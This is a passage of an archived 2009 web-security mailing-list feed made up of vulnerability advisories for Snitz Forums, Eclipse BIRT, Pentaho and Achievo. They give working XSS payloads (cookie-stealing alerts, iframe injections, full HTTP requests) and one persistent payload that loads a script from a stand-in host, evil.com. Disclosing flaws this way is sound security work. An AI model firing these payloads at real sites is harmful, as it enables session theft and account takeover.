&lt;br&gt;manual or automated process and would like to participate please let us
&lt;br&gt;know. Please contact Sergey Gordeychik (gordey_at_ptsecurity.com).
&lt;br&gt;&lt;br&gt;Regards,
&lt;br&gt;- Sergey Gordeychik 
&lt;br&gt;&lt;a href=&quot;http://www.webappsec.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.webappsec.org/&lt;/a&gt;&amp;nbsp;The Web Application Security Consortium
&lt;br&gt;&lt;br&gt;&lt;br&gt;----------------------------------------------------------------------------
&lt;br&gt;Join us on IRC: irc.freenode.net #webappsec
&lt;br&gt;&lt;br&gt;Have a question? Search The Web Security Mailing List Archives: 
&lt;br&gt;&lt;a href=&quot;http://www.webappsec.org/lists/websecurity/archive/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.webappsec.org/lists/websecurity/archive/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Subscribe via RSS: 
&lt;br&gt;&lt;a href=&quot;http://www.webappsec.org/rss/websecurity.rss&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.webappsec.org/rss/websecurity.rss&lt;/a&gt;&amp;nbsp;[RSS Feed]
&lt;br&gt;&lt;br&gt;Join WASC on LinkedIn
&lt;br&gt;&lt;a href=&quot;http://www.linkedin.com/e/gis/83336/4B20E4374DBA&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.linkedin.com/e/gis/83336/4B20E4374DBA&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/WASC-Announcement%3A-2008-Web-Application-Security-Statistics-Published-tp25933179p25933179.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25933495</id>
	<title>Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities</title>
	<published>2009-10-15T08:50:10Z</published>
	<updated>2009-10-15T08:50:10Z</updated>
	<author>
		<name>Andrea Fabrizi</name>
	</author>
	<content type="html">**************************************************************
&lt;br&gt;Application: Snitz Forums 2000
&lt;br&gt;Version affected: &amp;nbsp;3.4.07
&lt;br&gt;Website: &lt;a href=&quot;http://forum.snitz.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://forum.snitz.com/&lt;/a&gt;&lt;br&gt;Discovered By: Andrea Fabrizi
&lt;br&gt;Email: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=25933495&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;andrea.fabrizi@...&lt;/a&gt;
&lt;br&gt;Web: &lt;a href=&quot;http://www.andreafabrizi.it&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.andreafabrizi.it&lt;/a&gt;&lt;br&gt;Vuln: Multiple Cross-Site Scripting
&lt;br&gt;**************************************************************
&lt;br&gt;&lt;br&gt;###### PERMANENT XSS
&lt;br&gt;If [sound] tag is allowed:
&lt;br&gt;&lt;br&gt;[sound]&lt;a href=&quot;http://url_to_valid_mp3_or_m3u_file.m3u&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://url_to_valid_mp3_or_m3u_file.m3u&lt;/a&gt;&amp;quot;
&lt;br&gt;onLoad=&amp;quot;alert(document.cookie)[/sound]
&lt;br&gt;######
&lt;br&gt;&lt;br&gt;###### LINK XSS
&lt;br&gt;&lt;a href=&quot;http://localhost/forum/pop_send_to_friend.asp?url=&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/forum/pop_send_to_friend.asp?url=&lt;/a&gt;&amp;lt;/textarea&amp;gt;&amp;lt;img
&lt;br&gt;src=&amp;quot;&lt;a href=&quot;http://www.google.it/intl/it_it/images/logo.gif&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.google.it/intl/it_it/images/logo.gif&lt;/a&gt;&amp;quot; onLoad
&lt;br&gt;=&amp;quot;alert(document.cookie)&amp;quot;&amp;gt;
&lt;br&gt;&lt;br&gt;Note the space: onLoad&amp;lt;space&amp;gt;=&amp;quot;alert(document.cookie)&amp;quot;
&lt;br&gt;######
&lt;br&gt;&lt;br&gt;-- 
&lt;br&gt;Andrea Fabrizi
&lt;br&gt;&lt;a href=&quot;http://www.andreafabrizi.it&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.andreafabrizi.it&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Snitz-Forums-2000-Multiple-Cross-Site-Scripting-Vulnerabilities-tp25933495p25933495.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25933100</id>
	<title>[AntiSnatchOr] Eclipse BIRT &lt;= 2.2.1 Reflected XSS</title>
	<published>2009-10-13T16:53:39Z</published>
	<updated>2009-10-13T16:53:39Z</updated>
	<author>
		<name>Michele Orru</name>
	</author>
	<content type="html">Eclipse BIRT &amp;lt;= 2.2.1 Reflected XSS
&lt;br&gt;&lt;br&gt;Vendor: Eclipse
&lt;br&gt;Advisory: &lt;a href=&quot;http://antisnatchor.com/2008/12/18/eclipse-birt-reflected-xss/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://antisnatchor.com/2008/12/18/eclipse-birt-reflected-xss/&lt;/a&gt;&lt;br&gt;Author: &amp;nbsp;Michele &amp;quot;euronymous&amp;quot; Orrù (euronymous AT antisnatchor DOT com)
&lt;br&gt;&lt;br&gt;Quite a common problem in a lot of Java based applications: reflected
&lt;br&gt;XSS in Java stack trace.
&lt;br&gt;&lt;br&gt;A Reflected XSS is present in the _report parameter: here below the modified
&lt;br&gt;request (that is the BIRT 2.2.1 version included in Konakart 2.2.6)
&lt;br&gt;&lt;br&gt;GET
&lt;br&gt;/birt-viewer/run?__report='&amp;quot;&amp;gt;&amp;lt;iframe%20src=javascript:alert(666)&amp;gt;&amp;r=-703171660
&lt;br&gt;HTTP/1.1
&lt;br&gt;Host: localhost:8780
&lt;br&gt;User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18)
&lt;br&gt;Gecko/20081029 Firefox/2.0.0.18
&lt;br&gt;Accept:
&lt;br&gt;text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
&lt;br&gt;Accept-Language: en-us,en;q=0.5
&lt;br&gt;Accept-Encoding: gzip,deflate
&lt;br&gt;Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
&lt;br&gt;Keep-Alive: 300
&lt;br&gt;Proxy-Connection: keep-alive
&lt;br&gt;Referer: &lt;a href=&quot;http://localhost:8780/konakartadmin/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost:8780/konakartadmin/&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;Konakart is actually using org.eclipse.birt.core_2.2.1.r22x_v20070924, that is
&lt;br&gt;actually old.
&lt;br&gt;&lt;br&gt;&amp;nbsp;- Disclosure timeline:
&lt;br&gt;2008-12-17 11:04:15 EST : Vendor Contacted
&lt;br&gt;2009-02-11 03:39:09 EST: Bug fix
&lt;br&gt;2009-03-09 05:32:42 EDT: Patches verified on 2.5.0
&lt;br&gt;&lt;br&gt;&amp;nbsp;- CREDITS
&lt;br&gt;&lt;br&gt;Michele &amp;quot;euronymous&amp;quot; Orru'
&lt;br&gt;&lt;br&gt;&amp;nbsp;- &amp;nbsp;LEGAL NOTICES
&lt;br&gt;&lt;br&gt;Copyright (c) 2009 Michele &amp;quot;euronymous&amp;quot; Orru'
&lt;br&gt;&lt;br&gt;Permission is granted for the redistribution of this alert
&lt;br&gt;electronically. It may not be edited in any way without mine express
&lt;br&gt;written consent. If you wish to reprint the whole or any
&lt;br&gt;part of this alert in any other medium other than electronically,
&lt;br&gt;please email me for permission.
&lt;br&gt;&lt;br&gt;Disclaimer: The information in the advisory is believed to be accurate
&lt;br&gt;at the time of publishing based on currently available information. Use
&lt;br&gt;of the information constitutes acceptance for use in an AS IS condition.
&lt;br&gt;There are no warranties with regard to this information. Neither the
&lt;br&gt;author nor the publisher accepts any liability for any direct, indirect,
&lt;br&gt;or consequential loss or damage arising from use of, or reliance on,
&lt;br&gt;this information.
&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-AntiSnatchOr--Eclipse-BIRT-%3C%3D-2.2.1-Reflected-XSS-tp25933100p25933100.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25933163</id>
	<title>[AntiSnatchOr] Pentaho Bi-server multiple vulnerabilities</title>
	<published>2009-10-13T16:42:45Z</published>
	<updated>2009-10-13T16:42:45Z</updated>
	<author>
		<name>Michele Orru</name>
	</author>
	<content type="html">Pentaho 1.7.0.1062 Multiple Vulnerabilities
&lt;br&gt;&lt;br&gt; Name Multiple Vulnerabilities in Pentaho
&lt;br&gt; Systems Affected Pentaho &amp;lt;= 1.7.0.1062
&lt;br&gt; Severity High
&lt;br&gt; Impact (CVSSv2) High 7/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
&lt;br&gt; Vendor &lt;a href=&quot;http://www.pentaho.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.pentaho.com&lt;/a&gt;&lt;br&gt; Advisory &lt;a href=&quot;http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/&lt;/a&gt;&lt;br&gt; Authors Michele &amp;quot;euronymous&amp;quot; Orrù (euronymous AT antisnatchor DOT com)
&lt;br&gt;&lt;br&gt; Date 20081224
&lt;br&gt;&lt;br&gt;I. BACKGROUND
&lt;br&gt;Pentaho Analysis puts rich, analytic power in the hands of your business users
&lt;br&gt;helping them gain the insights and understanding they need to make optimal
&lt;br&gt;business decisions.
&lt;br&gt;&lt;br&gt;II. DESCRIPTION
&lt;br&gt;&lt;br&gt;Multiple vulnerabilities exist in Pentaho .
&lt;br&gt;&lt;br&gt;III. ANALYSIS
&lt;br&gt;&lt;br&gt;Summary:
&lt;br&gt;&lt;br&gt; A) Reflected XSS
&lt;br&gt; B) Password field with autocomplete enabled
&lt;br&gt; C) Disclosure of Session Tokens in URL
&lt;br&gt;&lt;br&gt;&lt;br&gt;A) Reflected XSS
&lt;br&gt;&lt;br&gt;The presence of the Cross Site Scripting plague has been veryfied on
&lt;br&gt;/pentaho/ViewAction parameters. The attacker-supplied code can perform
&lt;br&gt;different actions, such as stealing the victim's session token or
&lt;br&gt;login credentials,
&lt;br&gt;performing arbitrary actions on the victim's behalf, and logging their
&lt;br&gt;keystrokes.
&lt;br&gt;Users can be induced to issue the attacker's crafted request in various ways.
&lt;br&gt;For example, an attacker can send to the victim a link containing a
&lt;br&gt;malicious URL in
&lt;br&gt;an email or instant message, instead of submit the link to popular web
&lt;br&gt;applications
&lt;br&gt;that don't escape HTML characters such as &amp;lt;&amp;gt;'\().
&lt;br&gt;&lt;br&gt;An example is the following:
&lt;br&gt;&lt;br&gt;GET /pentaho/ViewAction?&amp;
&lt;br&gt;outputType=khgj345&amp;lt;script&amp;gt;alert('Pwnd')&amp;lt;/script&amp;gt;kjh3535
&lt;br&gt;&amp;solution=opentaps&amp;action=CustomerLifeTimeOrders.xaction&amp;path=Customer%20Analysis
&lt;br&gt;HTTP/1.0
&lt;br&gt;User-Agent: Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1
&lt;br&gt;Host: demo1.opentaps.org:8181
&lt;br&gt;Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
&lt;br&gt;image/png, image/jpeg,
&lt;br&gt;image/gif, image/x-xbitmap, */*;q=0.1
&lt;br&gt;Accept-Language: it-IT,it;q=0.9,en;q=0.8
&lt;br&gt;Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
&lt;br&gt;Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
&lt;br&gt;Referer: &lt;a href=&quot;http://demo1.opentaps.org:8181/pentaho/ViewAction?solution=opentaps&amp;path=&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://demo1.opentaps.org:8181/pentaho/ViewAction?solution=opentaps&amp;path=&lt;/a&gt;&lt;br&gt;Customer%20Analysis&amp;action=CustomerLifeTimeOrders.xaction
&lt;br&gt;Cookie: JSESSIONID=85740C182994F78946BE8A38605396B1
&lt;br&gt;Cookie2: $Version=1
&lt;br&gt;Proxy-Connection: Keep-Alive
&lt;br&gt;&lt;br&gt;When the request will be executed, a popup showing the string Pwnd can be seen.
&lt;br&gt;Here the response:
&lt;br&gt;&lt;br&gt;HTTP/1.1 200 OK
&lt;br&gt;Server: Apache-Coyote/1.1
&lt;br&gt;X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA
&lt;br&gt;date=200707131605)/Tomcat-5.5
&lt;br&gt;content-disposition: inline;filename=Customer_Lifetime_Orders.html
&lt;br&gt;Content-Type: text/html;charset=UTF-8
&lt;br&gt;Content-Length: 1615
&lt;br&gt;Date: Wed, 24 Dec 2008 09:55:32 GMT
&lt;br&gt;Connection: close
&lt;br&gt;&lt;br&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;Pentaho BI Platform - Error in Action&amp;lt;/title&amp;gt;&amp;lt;link
&lt;br&gt;rel=&amp;quot;stylesheet&amp;quot;
&lt;br&gt;type=&amp;quot;text/css&amp;quot; href=&amp;quot;/pentaho-style/active/default.css&amp;quot;&amp;gt;&amp;lt;/head&amp;gt;&amp;lt;body
&lt;br&gt;dir=&amp;quot;LTR&amp;quot;&amp;gt;&amp;lt;table
&lt;br&gt;cellspacing=&amp;quot;10&amp;quot;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;quot;portlet-section&amp;quot; colspan=&amp;quot;3&amp;quot;&amp;gt;Failed&amp;lt;hr
&lt;br&gt;size=&amp;quot;1&amp;quot;/&amp;gt;&amp;lt;/td&amp;gt;
&lt;br&gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;quot;portlet-font&amp;quot; valign=&amp;quot;top&amp;quot;&amp;gt;&amp;lt;span style=&amp;quot;color:red&amp;quot;&amp;gt;
&lt;br&gt;Errore: SecureFilterComponent.ERROR_0001 -
&lt;br&gt;&amp;quot;khgj345&amp;lt;script&amp;gt;alert('Pwnd')&amp;lt;/script&amp;gt;kjh3535&amp;quot;
&lt;br&gt;non Ã¨ una selezione consentita &amp;quot;outputType&amp;quot; per questo utente
&lt;br&gt;(org.pentaho.plugin.core.SecureFilterComponent)&amp;lt;/span&amp;gt;&amp;lt;p/&amp;gt;Debug:
&lt;br&gt;Partenza dellesecuzione di
&lt;br&gt;{0}/{1}/{2} (org.pentaho.core.solution.SolutionEngine)&amp;lt;br/&amp;gt;Debug:
&lt;br&gt;Lettura del contesto a
&lt;br&gt;runtime e dei dati
&lt;br&gt;(org.pentaho.core.solution.SolutionEngine)&amp;lt;br/&amp;gt;Debug: Caricamento del
&lt;br&gt;file di configurazione dell'Action Sequence
&lt;br&gt;(org.pentaho.core.solution.SolutionEngine)&amp;lt;br/&amp;gt;
&lt;br&gt;Debug: Audit: instanceId=0113b013-d1a1-11dd-a254-65c8cd8ab409,
&lt;br&gt;objectId=org.pentaho.core.runtime.RuntimeContext,
&lt;br&gt;messageType=action_sequence_start
&lt;br&gt;(org.pentaho.core.runtime.RuntimeContext)&amp;lt;br/&amp;gt;Errore:
&lt;br&gt;SecureFilterComponent.ERROR_0001
&lt;br&gt;- &amp;quot;khgj345&amp;lt;script&amp;gt;alert('Pwnd')&amp;lt;/script&amp;gt;kjh3535&amp;quot; non Ã¨ una selezione
&lt;br&gt;consentita &amp;quot;outputType&amp;quot;
&lt;br&gt;per questo utente (org.pentaho.plugin.core.SecureFilterComponent)&amp;lt;br/&amp;gt;Errore:
&lt;br&gt;RuntimeContext.ERROR_0012 - LActionDefinition per {0} non Ã¨ stata
&lt;br&gt;eseguita con successo
&lt;br&gt;(org.pentaho.core.runtime.RuntimeContext)&amp;lt;br/&amp;gt;Errore:
&lt;br&gt;SolutionEngine.ERROR_0007 -
&lt;br&gt; Esecuzione dell'Action Sequence fallita
&lt;br&gt;(org.pentaho.core.solution.SolutionEngine)&amp;lt;br/&amp;gt;&amp;lt;/td&amp;gt;
&lt;br&gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;p&amp;gt;&amp;nbsp;&amp;nbsp;[it_41] Server Version Pentaho BI Platform
&lt;br&gt;1.7.0.1062&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
&lt;br&gt;&lt;br&gt;&lt;br&gt;The same servlet, /pentaho/ViewAction, contains other two parameters
&lt;br&gt;that are vulnerable to reflected
&lt;br&gt;XSS: &amp;quot;action&amp;quot; and &amp;quot;path&amp;quot; (that are exploitable in the same way).
&lt;br&gt;&lt;br&gt;&lt;br&gt;B) Password field with autocomplete enabled
&lt;br&gt;&lt;br&gt;The response to this request:
&lt;br&gt;&lt;br&gt;GET /pentaho/Login;jsessionid=857E0C182994F71355BE8A3860539BH7
&lt;br&gt;&lt;br&gt;contains the login form where credentials are passed to the application.
&lt;br&gt; [...]
&lt;br&gt; &amp;lt;tr&amp;gt;
&lt;br&gt;    &amp;lt;td colspan=&amp;quot;2&amp;quot;&amp;gt;&amp;lt;input type='password' name='j_password' size=&amp;quot;30&amp;quot; &amp;gt;&amp;lt;/td&amp;gt;
&lt;br&gt; &amp;lt;/tr&amp;gt;
&lt;br&gt; [...]
&lt;br&gt;&lt;br&gt;The problem is that the autocomplete tag is not set to OFF. We recommend it,
&lt;br&gt;especially for the presence of reflected XSS that in this situation
&lt;br&gt;can be exploited
&lt;br&gt;to retrieve the password input from the browser history.
&lt;br&gt;&lt;br&gt;&lt;br&gt;C) Disclosure of Session Tokens in URL
&lt;br&gt;The web application session identifier, JSESSIONID, is disclosed in the URL:
&lt;br&gt;that's a bad practice because these sensitive informations will be visible
&lt;br&gt;in the client browser history, in the Referer header, in bookmarks.
&lt;br&gt;&lt;br&gt;An example:
&lt;br&gt;&lt;a href=&quot;http://demo1.opentaps.org:8181/pentaho/Login;jsessionid=857E0C18&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://demo1.opentaps.org:8181/pentaho/Login;jsessionid=857E0C18&lt;/a&gt;&lt;br&gt;2994F71355BE8A38605396B1
&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;IV. DETECTION
&lt;br&gt;&lt;br&gt;1.7.0.1062 and earlier versions are vulnerable.
&lt;br&gt;&lt;br&gt;V. WORKAROUND
&lt;br&gt;&lt;br&gt;Proper input validation and session management will fix the vulnerabilities.
&lt;br&gt;&lt;br&gt;VI. VENDOR RESPONSE
&lt;br&gt;&lt;br&gt;No fix available.
&lt;br&gt;&lt;br&gt;VII. CVE INFORMATION
&lt;br&gt;&lt;br&gt;No CVE at this time.
&lt;br&gt;&lt;br&gt;VIII. DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;20081224 Initial vendor contact
&lt;br&gt;20081229 Second vendor contact
&lt;br&gt;20090120 Bugs have been assigned to developers
&lt;br&gt;20090619 Bugs have been finally fixed
&lt;br&gt;&lt;br&gt;&lt;br&gt;IX. CREDIT
&lt;br&gt;&lt;br&gt;Michele &amp;quot;euronymous&amp;quot; Orru'
&lt;br&gt;&lt;br&gt;X. LEGAL NOTICES
&lt;br&gt;&lt;br&gt;Copyright (c) 2008 Michele &amp;quot;euronymous&amp;quot; Orru'
&lt;br&gt;&lt;br&gt;Permission is granted for the redistribution of this alert
&lt;br&gt;electronically. It may not be edited in any way without mine express
&lt;br&gt;written consent. If you wish to reprint the whole or any
&lt;br&gt;part of this alert in any other medium other than electronically,
&lt;br&gt;please email me for permission.
&lt;br&gt;&lt;br&gt;Disclaimer: The information in the advisory is believed to be accurate
&lt;br&gt;at the time of publishing based on currently available information. Use
&lt;br&gt;of the information constitutes acceptance for use in an AS IS condition.
&lt;br&gt;There are no warranties with regard to this information. Neither the
&lt;br&gt;author nor the publisher accepts any liability for any direct, indirect,
&lt;br&gt;or consequential loss or damage arising from use of, or reliance on,
&lt;br&gt;this information.
&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-AntiSnatchOr--Pentaho-Bi-server-multiple-vulnerabilities-tp25933163p25933163.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25933188</id>
	<title>[BONSAI] XSS in Achievo - Customized XSS payload included</title>
	<published>2009-10-13T07:01:10Z</published>
	<updated>2009-10-13T07:01:10Z</updated>
	<author>
		<name>Bonsai - Information Security</name>
	</author>
	<content type="html">&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Bonsai Information Security - Advisory
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://www.bonsai-sec.com/research/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.bonsai-sec.com/research/&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Multiple XSS in Achievo
&lt;br&gt;&lt;br&gt;1. *Advisory Information*
&lt;br&gt;&lt;br&gt;Title: Multiple XSS in Achievo
&lt;br&gt;Advisory ID: BONSAI-2009-0101
&lt;br&gt;Advisory URL: &lt;a href=&quot;http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt&lt;/a&gt;&lt;br&gt;Date published: 2009-10-13
&lt;br&gt;Vendors contacted: Achievo
&lt;br&gt;Release mode: Coordinated release
&lt;br&gt;&lt;br&gt;&lt;br&gt;2. *Vulnerability Information*
&lt;br&gt;&lt;br&gt;Class: Multiple Cross Site Scripting (XSS)
&lt;br&gt;Remotely Exploitable: Yes
&lt;br&gt;Locally Exploitable: Yes
&lt;br&gt;CVE Name: CVE-2009-2733
&lt;br&gt;&lt;br&gt;&lt;br&gt;3. *Software Description*
&lt;br&gt;&lt;br&gt;Achievo is a flexible web-based resource management tool for business
&lt;br&gt;environments. Achievo's resource management capabilities will enable
&lt;br&gt;organizations to support their business processes in a simple, but effective
&lt;br&gt;manner [0].
&lt;br&gt;&lt;br&gt;&lt;br&gt;4. *Vulnerability Description*
&lt;br&gt;&lt;br&gt;Cross-Site Scripting attacks are a type of injection problem, in which
&lt;br&gt;malicious scripts are injected into the otherwise benign and trusted web sites.
&lt;br&gt;Cross-site scripting (XSS) attacks occur when an attacker uses a web
&lt;br&gt;application to send malicious code, generally in the form of a browser side
&lt;br&gt;script, to a different end user. Flaws that allow these attacks to succeed are
&lt;br&gt;quite widespread and occur anywhere a web application uses input from a user
&lt;br&gt;in the output it generates without validating or encoding it.
&lt;br&gt;&lt;br&gt;For additional information, please read [1].
&lt;br&gt;&lt;br&gt;&lt;br&gt;5. *Vulnerable packages*
&lt;br&gt;&lt;br&gt;Version &amp;lt;= 1.3.4
&lt;br&gt;&lt;br&gt;&lt;br&gt;6. *Non-vulnerable packages*
&lt;br&gt;&lt;br&gt;Achievo developers informed us that all users should upgrade to the latest
&lt;br&gt;version of Achievo, which fixes this vulnerability. More information to be
&lt;br&gt;found here:
&lt;br&gt;&amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.achievo.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.achievo.org/&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;7. *Credits*
&lt;br&gt;&lt;br&gt;This vulnerability was discovered by Ryan Dewhurst ( ryan -at- bonsai-sec.com ).
&lt;br&gt;&lt;br&gt;&lt;br&gt;8. *Technical Description*
&lt;br&gt;&lt;br&gt;8.1 A Persistent Cross Site Scripting vulnerability was found in the 'tittle'
&lt;br&gt;variable within the scheduler module. This is because the application does not
&lt;br&gt;properly sanitise the users input. The vulnerability can be triggered by a user
&lt;br&gt;submitting the following data within the scheduler title:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;lt;SCRIPT SRC=//evil.com/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;
&lt;br&gt;&lt;br&gt;Which will include the xss.js javascript file within the schedule. A javascript
&lt;br&gt;that exploits this issue and creates a new administrator user in the system can
&lt;br&gt;be found in Bonsai's blog [2].
&lt;br&gt;&lt;br&gt;8.2 A Reflected Cross Site Scripting vulnerability was found in the
&lt;br&gt;atksearch[contractnumber], atksearch_AE_customer[customer] and
&lt;br&gt;atksearchmode[contracttype] variables within the 'Organisation Contracts'
&lt;br&gt;administration page. This is because the application does not properly sanitise
&lt;br&gt;the users input. The vulnerability can be triggered by clicking on the
&lt;br&gt;following URL:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.example.com/dispatch.php?atkprevlevel=0&amp;atkescape=&amp;atknodetype=organization.contracts&amp;atkaction=admin&amp;atksmartsearch=clear&amp;atkstartat=0&amp;atksearch&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.example.com/dispatch.php?atkprevlevel=0&amp;atkescape=&amp;atknodetype=organization.contracts&amp;atkaction=admin&amp;atksmartsearch=clear&amp;atkstartat=0&amp;atksearch&lt;/a&gt;[contractnumber]=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('xss');&amp;lt;/script&amp;gt;&amp;atksearchmode[contractnumber]=substring&amp;atksearch[contractname]=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('xss');&amp;lt;/script&amp;gt;&amp;atksearchmode[contractname]=substring&amp;atksearch_AE_contracttype[contracttype][=&amp;atksearchmode[contracttype]=exact&amp;atksearch_AE_customer[customer]=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('xss');&amp;lt;/script&amp;gt;&amp;atksearchmode[customer]=substring
&lt;br&gt;&lt;br&gt;9. *Report Timeline*
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; - 2009-07-09:
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Vulnerabilities were identified.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; - 2009-08-08:
&lt;br&gt;&amp;nbsp; &amp;nbsp; Vendor contacted.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; - 2009-08-12:
&lt;br&gt;&amp;nbsp; &amp;nbsp; Vendor confirmed vulnerabilities.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; - 2009-08-14:
&lt;br&gt;&amp;nbsp; &amp;nbsp; Vendor sets possible release date of fixed version to Monday 12 Oct.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; - 2009-10-12:
&lt;br&gt;&amp;nbsp; &amp;nbsp; Vendor released fixed version.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; - 2009-10-13:
&lt;br&gt;&amp;nbsp; &amp;nbsp; The advisory BONSAI-2009-0101 is published.
&lt;br&gt;&lt;br&gt;&lt;br&gt;10. *References*
&lt;br&gt;&lt;br&gt;[0] &lt;a href=&quot;http://www.achievo.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.achievo.org/&lt;/a&gt;&lt;br&gt;[1] &lt;a href=&quot;http://www.owasp.org/index.php/Cross_site_scripting&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.owasp.org/index.php/Cross_site_scripting&lt;/a&gt;&lt;br&gt;[2] &lt;a href=&quot;http://www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/&lt;/a&gt;&lt;br&gt;&lt;br&gt;11. *About Bonsai*
&lt;br&gt;&lt;br&gt;Bonsai is a company involved in providing professional computer
&lt;br&gt;information security services.
&lt;br&gt;Currently a sound growth company, since its foundation in early 2009
&lt;br&gt;in Buenos Aires, Argentina,
&lt;br&gt;we are fully committed to quality service, and focused on our
&lt;br&gt;customers' real needs.
&lt;br&gt;&lt;br&gt;&lt;br&gt;12. *Disclaimer*
&lt;br&gt;&lt;br&gt;The contents of this advisory are copyright (c) 2009 Bonsai
&lt;br&gt;Information Security, and may be
&lt;br&gt;distributed freely provided that no fee is charged for this
&lt;br&gt;distribution and proper credit is
&lt;br&gt;given.
&lt;br&gt;&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-BONSAI--XSS-in-Achievo---Customized-XSS-payload-included-tp25933188p25933188.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-25933106</id>
	<title>[BONSAI] SQL Injection in Achievo</title>
	<published>2009-10-13T06:59:37Z</published>
	<updated>2009-10-13T06:59:37Z</updated>
	<author>
		<name>Bonsai - Information Security</name>
	</author>
	<content type="html">&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Bonsai Information Security - Advisory
